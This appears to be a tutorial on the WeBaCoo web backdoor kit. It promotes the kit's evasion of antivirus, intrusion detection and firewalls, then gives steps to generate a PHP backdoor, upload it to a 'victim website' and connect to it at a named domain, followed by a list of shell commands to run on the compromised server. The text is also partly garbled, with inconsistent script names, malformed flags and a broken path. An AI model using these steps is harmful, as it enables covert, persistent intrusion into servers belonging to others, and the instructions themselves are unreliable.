WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.
Now unzip the file unzip webacoo.zip
Now Type Command: ./webcoo.pl –g –o webdoor.php
This will generate code for a backdoor (-g) Generate backdoor code (-ois required). Here is a screenshot of the command terminal view:
Now upload webdoor.php file to victim website and proceed to connect to the server with the following command:
. / webacoo.pl -t -u http://telecallerjobs.com/webdoor.php
Ls - List information about the FILEs (the current directory by default)
Uname –a - print all information
Free - display information about free and used memory on the system
pwd - print name of current/working directory
Df - displays the amount of disk space available on the filesystem containing each file name argument
W - Displays information about the users currently on the machine, and their processes.
route - show / manipulate the IP routing table
Load - Load machine code and initialize new commands.
Download – Download file from server
Cat - cat to view the file, we see only the normal text
